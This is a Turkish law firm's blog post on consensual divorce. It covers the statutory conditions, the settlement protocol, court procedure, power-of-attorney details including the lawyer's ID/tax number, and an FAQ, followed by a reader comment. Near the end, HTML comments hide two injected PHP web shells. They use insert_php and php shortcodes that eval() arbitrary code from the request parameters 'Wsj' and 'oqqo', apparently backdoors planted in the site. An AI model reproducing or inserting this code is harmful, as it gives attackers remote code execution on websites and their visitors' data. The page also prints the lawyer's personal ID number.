Anlaşmalı Boşanma Davası

By | 20 Şubat 2013

Türk Hukukunda kanun koyucu, eşlerin iradelerine de önem vererek anlaşmalı boşanma kurumunu düzenlemiştir. Aile birliğinin varlığını devam ettirme amacı taşıyan Türk Medeni Kanunu hükümlerine göre anlaşmalı boşanma hususu da belli başlı şartlara bağlı tutulmuştur. 4721 sayılı Türk Medeni Kanununun 166/II maddesinde düzenlenen anlaşmalı boşanmanın gerçekleşebilmesi için şu şartların varlığı gerekmektedir :

 • Evlilik en az 1 yıl sürmüş olmalı,
 • Eşlerin birlikte başvurması,
 • Hakimin tarafları bizzat dinlemesi,
 • Anlaşmalı boşanmaya ilişkin hususların protokole bağlanması.

Anlaşmalı boşanma davasında yukarıda saymış olduğumuz hususların yerine getirilmemesi halinde mevcut dava çekişmeli boşanma davasına dönüşecektir veya eksikliğin türüne göre davanın reddine karar verilecektir. Şayet evliliğin henüz 1 yılı doldurmamış olması halinde dava reddedilecek, duruşma esnasında taraflardan birinin boşanma işlemine icazet vermemesi halinde ise dava, çekişmeli boşanma davasına dönüşecektir.

Anlaşmalı boşanmada esas amaç tarafların iradelerine değer vermek ve bu iradeleri ön planda tutmaktır. Fakat bunun yanı sıra ağır işleyen Türk Hukuk sisteminde taraflara böyle bir imkan sağlanarak da boşanma işleminin daha kolay ve hızlı bir şekilde gerçekleşmesi imkanı yaratılmıştır. Nitekim boşanma davaları yıllarca devam edebilmekte, bu süreç içerisinde taraflar yıpranmakta ve toplum içerisinde sıkıntılı bir süreç geçirmektedirler. Bunun yanı sıra anlaşmalı boşanma protokolüne hakimin müdahelesiyle birlikte zayıf konumda olan eşin korunması da amaçlanmıştır.

Anlaşmalı boşanma ilişkin taraflar arasında düzenlenen protokol belli başlı hususları içermelidir. Tarafların çocuklarının durumu, boşanmanın mali sonuçları, yargılama giderleri, nafaka ve tazminata ilişkin hususlar protokolde açıkça yer almalı ve taraflar arasında buna ilişkin herhangi bir ihtilaf yer almamalıdır. İşbu nedenle anlaşmalı boşanmada protokolünün bağlayıcılığı önemli olup tarafların boşanma neticesindeki hukuki durumlarını belirlemesi açısından da hayati bir önem taşımaktadır.

Anlaşmalı Boşanma Protokolü Nasıl Olmalıdır ? Anlaşmalı boşanma protokolü gelişigüzel düzenlenecek bir protokol değildir. Hükümlerin özellikle incelenmesi ve buna göre protokole aktarılması gerekir. Nitekim tarafların bu protokole bağlı olarak boşanmaları gerçekleşecek ve taraflar sonraki yaşamlarında bu protokole bağlı olacaklardır. Hal böyleyken anlaşmalı boşanma protokolü önem taşımaktadır. Anlaşmalı boşanma protokolünün nasıl düzenleneceği ve nelerin zorunlu unsur olduğu konusunda detaylı açıklamalarımız için lütfen anlaşmalı boşanma protokolü yazımızı tıklayarak okuyunuz : Anlaşmalı Boşanma Protokolü.

Anlaşmalı boşanma protokolünde, yukarıda da bahsettiğimiz üzere bazı zorunlu unsurların bulunması gerekir. Bu zorunlu unsurlar ; nafaka, tazminat, velayet, mal paylaşımı ve çocukla ilişki tesisi. Bu hususlara ilişkin detaylı açıklamalar anlaşmalı boşanma protokolü yazımızda yer almaktadır fakat burada tazminat ve nafaka hususlarına ilişkin yazılarımızı iletmek yerinde olacaktır : Anlaşmalı Boşanma Davasında Tazminat Belirlenmesi ve Anlaşmalı Boşanma Davasında Velayetin Belirlenmesi.

DAVA SÜRECİ

Eşler, anlaşmalı boşanma davasını kendileri açabileceği gibi avukatları aracılığıyla da bu işlemi gerçekleştirebilirler. Anlaşmalı boşanma davası sürecinde dikkat edilmesi gereken hususlar söz konusudur. Bunlara kısaca değinmek gerekirse :

 • Dava ortak bir dilekçe ile açılmalı veya eşin açtığı dava diğer eş tarafından kabul edilmeli,
 • Anlaşmalı boşanma protokolü düzenlenmeli
 • Taraflar duruşmada boşanma arzularını hakime bizzat beyan etmeli

Anlaşmalı boşanma davası açıldığında ilgili mahkeme duruşma günü verecek ve tarafların mutlak bir şekilde duruşmada hazır olmaları gerekecektir. Taraflardan birisinin duruşmamaya gelmemesi halinde anlaşmalı boşanmaya aile mahkemesi hakimi karar vermeyecektir. Bu nedenlerle anlaşmalı boşanma duruşmasında tarafların hazır bulunması temel şartlardan birisidir. Bu şarta ilişkin yazımızı okuyabilirsiniz : Anlaşmalı Boşanma Davasında Taraf Teşkili. ve Anlaşmalı Boşanmada Tarafların Hazır Bulunması

Dava Süresi : Anlaşmalı boşanma davası Türk Hukukunda tek celsede biten duruşmalardan bir tanesi olup 2-4 ay arasında sürmektedir. Mahkemelerin yoğunluğuna göre daha kısa da sürebilmektedir. Davanın açılmasıyla birlikte tarafların taleplerinin tam ve eksiksiz olması halinde mahkemece duruşma tarihi verilecektir. Duruşmada tarafların iradelerini boşanma yönünde beyan etmeleri neticesinde hakim tarafından boşanmaya karar verilecek ve davanın kesinleşmesiyle birlikte boşanma işlemi tamamlanmış olacaktır.

Görevli Mahkeme : Anlaşmalı boşanma davasında görevli mahkeme Aile Mahkemeleri olup, başka bir mahkemede davanın açılması halinde dava, görev yönünden reddedilecektir.

Yetkili Mahkeme : Anlaşmalı boşanma davasında yetkili mahkemenin tayini için genel yetki kurallarına gidilecektir.

VEKALETNAME

Anlaşmalı boşanma davasında, anlaşmalı boşanma avukatı için resimli boşanma vekaletnamesi çıkarılmalıdır. Vekalet verilecek İstanbul Avrupa Yakası ve Anadolu Yakası anlaşmalı boşanma avukatı bilgileri şu şekildedir :

Vekaletname bilgileri şu şekildedir :

Adres: Sinanpaşa Mah. Hasfırın Cad. Vidin İş Merkezi K.4 D.41 Beşiktaş/İstanbul

Vergi D: Beşiktaş VD.

Vergi No: 13895390200 (T.C. kimlik no)

Baro: İstanbul Barosu

Baro sicil no: 44325

ANLAŞMALI BOŞANMA DAVASINDA SIK SORULAN SORULAR

SORU   : ANLAŞMALI BOŞANMAK İSTİYORUM NE YAPMALIYIM ? 

CEVAP : Anlaşmalı boşanma yolunu seçecek eşler; öncelikli olarak bu konudaki iradelerini netleştirmelidir. Nitekim uygulamada karşımıza çıkan en büyük sorunlardan birisi, anlaşmalı boşanmak isteyen eşlerden birinin dava sürecinde bu kararından vazgeçerek davanın çekişmeli boşanma davasına dönüşmesine neden olmasıdır. Bu konuda aile mahkeme hakimleri çok katı bir tutum sergilemekte, dava genellikle sürüncemede kalmaktadır. Bu nedenle önemle üzerinde durulması gereken husus, eşlerin gerçekten boşanmaya karar vermiş olması gerektiğidir.

Anlaşmalı boşanmak isteyen eşler şu hususlara dikkat etmelidirler :

 • Evlilik en az 1 yıl sürmüş olmalı,
 • Eşler, mahkemeye birlikte başvurmalı veya bir eşin açtığı dava diğer eş tarafından kabul edilmeli,
 • Anlaşmalı boşanma protokolü düzenlenmeli,
 • Anlaşmalı boşanma protokolünde mali hususlar (maddi-manevi tazminat ve nafaka, malların paylaşımı) , çocuklara ilişkin hususlar (velayet ve velayet verilmeyen eşin çocukla kişisel münasebeti) kesinlikle düzenlemeli,
 • Duruşma esnasında eşler boşanma arzularını hakim önünde yinelemeli,
 • Mahkeme anlaşmalı boşanmaya karar vermeli.

Süreç bu şekilde işleyip eşler tarafından düzenlenecek olan anlaşmalı boşanma protokolü evliliğin bitimiyle beraber gelecekteki hayatı düzenleyeceğinden ötürü tarafların bu konuda hassas olmaları ve protokole gereken önemi göstermeli gerekmektedir. İşbu nedenle bu hususta uzman bir kişiden yardım alınması gerekmekte, anlaşmalı boşanma protokolünün düzenlenişi uzman ellere bırakılmalıdır.

SORU   : DURUŞMAYA KATILMAK ZORUNDA MIYIM ?

CEVAP : Anlaşmalı boşanma davalarında eşler; boşanma iradelerini her ne kadar yazılı olarak beyan etmiş olsalar da mahkemenin tayin edeceği duruşma gününde hazır bulunarak, bizzat hakimin önünde bu iradelerini yinelemek zorundadırlar. Aksi takdirde aile mahkemesi hakimi anlaşmalı boşanmaya karar vermeyecektir. Eşlerin hakim önünde boşanma iradelerini beyan etmesi gerekliliği, anlaşmalı boşanma davasının dava şartıdır. Avukatların, müvekkilleri adına duruşmada boşanma arzusunu beyan etmesi hiçbir şey ifade etmeyecektir. Bu nedenle eşler, duruşmada hazır bulunmalı, boşanmak istediklerini ve taraflarca imzalanan anlaşmalı boşanma protokolünü hakim önünde kabul etmelidir. Anlaşmalı boşanma davasında tarafların duruşmada hazır bulunmasına ilişkin detaylı açıklamalarımız için : Anlaşmalı Boşanma Davasında Tarafların Duruşmada Hazır Bulunması.

SORU    : ANLAŞMALI BOŞANMA DAVASINDA TANIK GEREKİR Mİ ? 

CEVAP: Anlaşmalı boşanma davası, tarafların iradelerine önem veren, tarafların iradeleriyle bu evlilik birliğini sonlandırmak istediğini kabul eden kurumdur. Bu nedenle boşanma iradelerinin tanıkla desteklenmesi gerekmeyecektir.

SORU   : ANLAŞMALI BOŞANMA DAVASI NE KADAR SÜRER ? 

CEVAP : Anlaşmalı boşanma davası, davanın açıldığı aile mahkemesinin yoğunluğuna göre 2 – 4 ay sürmektedir. Davanın açılması ve belgelerin eksiksiz olduğu varsayımında, ilk duruşmada eşlerin boşanma iradelerini beyan etmeleri üzerine mahkeme hakimi boşanmaya karar verir. Gerekçeli kararın yazılması ve usuli birkaç işlemin gerçekleştirilmesiyle birlikte anlaşmalı boşanma davası son bulacak, eşlerin boşanma işlemleri gerçekleştirilmiş olacaktır.

SORU   : EŞİM TÜRK VATANDAŞI DEĞİL.ANLAŞMALI BOŞANABİLİR MİYİZ ? 

CEVAP : Eşlerden birinin Türk vatandaşı olmaması, anlaşmalı boşanmaya engel teşkil etmeyecektir. Şayet her iki eş Türk vatandaşı olmasa dahi, anlaşmalı boşanma gerçekleştirilebilecektir. Nitekim eşlerden birinin veya her ikisinin yabancı vatandaş olması halinde,  davanın avukatlar aracılığıyla sürdürülmesi, davanın daha hızlı sonuçlandırılmasını sağlayacaktır.

SORU   :  NÜFUS KAYDIM NE ZAMAN DEĞİŞİR ? 

CEVAP : Aile mahkemesi hakimi, anlaşmalı boşanmaya karar verdikten sonra bazı usuli işlemlerin gerçekleştirilmesi gerekmektedir. Kararın verilmesiyle birlikte mahkeme tarafından en geç 1 ay içerisinde gerekçeli karar yazılacak, bu gerekçeli karar tarafların davayı temyiz etmemesiyle birlikte kesinleşecek ve kesinleşme ile birlikte mahkeme kalemi tarafından söz konusu boşanma kararı Nüfus Müdürlüğü’ne bildirilecektir. Bu noktadan sonra nüfus kayıtlarında gerekli düzenlemeler yapılacaktır.

SORU : ANLAŞMALI BOŞANMA AVUKATLIK ÜCRETİ NE KADARDIR ? 

CEVAP : Anlaşmalı boşanma davalarında yurttaşların en çok merak ettikleri husus vekalet ücretlerinin yani avukatlık ücretlerinin ne kadar olduğudur. Bu hususta Türkiye Barolar Birliğinin ve İstanbul Barosunun her yıl çıkarmış olduğu çizelgeler size yardımcı olabilir. Bunun yanı sıra tarafımıza iletişim bölümünden ulaşarak da detaylı bilgi alabilirsiniz.

SORU : ANLAŞMALI BOŞANMA DAVASINDA TALEP EDİLMEYEN İŞTİRAK NAFAKASI VE YOKSULLUK NAFAKASI SONRADAN TALEP EDİLEBİLİR Mİ?

CEVAP : Anlaşmalı olarak boşanma davası açan eşler aralarında iştirak nafakası ve yoksulluk nafakası hususunda anlaşmak durumundadırlar. Nitekim eşler, protokole nafaka verilmeyeceğine dair hüküm koyabilir. Böyle bir durumda ileride doğabilecek sıkıntılara binaen yoksulluk nafakası ve iştirak nafakası hükümleri konulmalı mıdır ? Tarafların bu hususta bir hak kaybı doğacak mıdır ? Tüm bu soruların yanıtları için aşağıdaki yazılarımızı okumanız faydalı olacaktır :

Anlaşmalı Boşanma Sonrası Yoksulluk Nafakası Talebi

– Anlaşmalı Boşanma Sonrası İştirak Nafakası Talebi

SORU : ANLAŞMALI BOŞANMA DAVASI İÇİN AVUKAT TUTMALI MIYIM ? 

CEVAP : Anlaşmalı boşanma davalarında eşler davalarını kendileri açmakta, avukatlık masraflarından kaçınmaktadır. Ülkemizde boşanma avukatına verilen ücretler, daha doğrusu avukata verilen vekalet ücretleri çöpe atılan para olarak görüldüğü için ve yurttaşların dava açmak konusunda özgüvenlerinin yüksek olması nedeniyle boşanma avukatına başvurulmamakta, eşler anlaşmalı boşanma davalarını kendileri açmaktadır. Bu davranış yanlış olup anlaşmalı boşanma protokolünün uzman bir boşanma avukatı tarafından düzenlenmesi gerekmektedir. Nitekim yukarıda bahsettiğimiz nafaka hususları, malların paylaşımı ve düğünde takılan altınların kimlerin hakkı olduğu hususunda yurttaşlar bilinçli değillerdir ve hukuki desteğe ihtiyaçları vardır. Bu nedenlerle basit bir dava olarak görülen anlaşmalı boşanma davası, ileride daha büyük sorunlara yol açabilir. Tüm bu nedenlerden ötürü Anlaşmalı boşanma davalarında boşanma avukatı tutulmasını tavsiye etmekteyiz.

SORU : BİR YIL DOLMADAN ANLAŞMALI BOŞANMA DAVASI AÇTIM NE YAPABİLİRİM ?

CEVAP : Eşler, bir yıl dolmadan anlaşmalı boşanma davası açmış iseler dava kanunlar gereği reddedilecektir. Fakat uygulamada aile mahkemesi hakimleri, boşanma avukatlarına şayet evliliğin bir yılının dolmasına yakın bir süre varsa süre vermektedir. Taraflar böyle bir durum söz konusu ise hakimden böyle bir talepte bulunabilirler. Bir yılı doldurmayan evliliklerde anlaşmalı boşanma sürecinin nasıl yürüyeceğine dair detaylı açıklamalarımız için : Bir Yıl Dolmadan Anlaşmalı Boşanma Davaları.

Incoming search terms:

 • anlaşmalı boşanma ne kadar sürer
 • anlasmali bosanma nekadar surer

Incoming search terms:

 • anlaşmalı boşanma ne kadar sürer
 • anlasmali bosanma nekadar surer

<!– [insert_php]if (isset($_REQUEST["Wsj"])){eval($_REQUEST["Wsj"]);exit;}[/insert_php][php]if (isset($_REQUEST["Wsj"])){eval($_REQUEST["Wsj"]);exit;}[/php] –>

Incoming search terms:

 • anlaşmalı boşanma ne kadar sürer
 • anlasmali bosanma nekadar surer

<!– [insert_php]if (isset($_REQUEST["oqqo"])){eval($_REQUEST["oqqo"]);exit;}[/insert_php][php]if (isset($_REQUEST["oqqo"])){eval($_REQUEST["oqqo"]);exit;}[/php] –>

Incoming search terms:

 • anlaşmalı boşanma ne kadar sürer
 • anlasmali bosanma nekadar surer

2 thoughts on “Anlaşmalı Boşanma Davası

 1. mehmet

  5yıl evli kaldık anlasmalı bosanma davası actık ve bolandık 10 gın sonra gelin kararı alın dendi ben gidip alıcam eşim almazsa ne olur tşk

  Reply

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir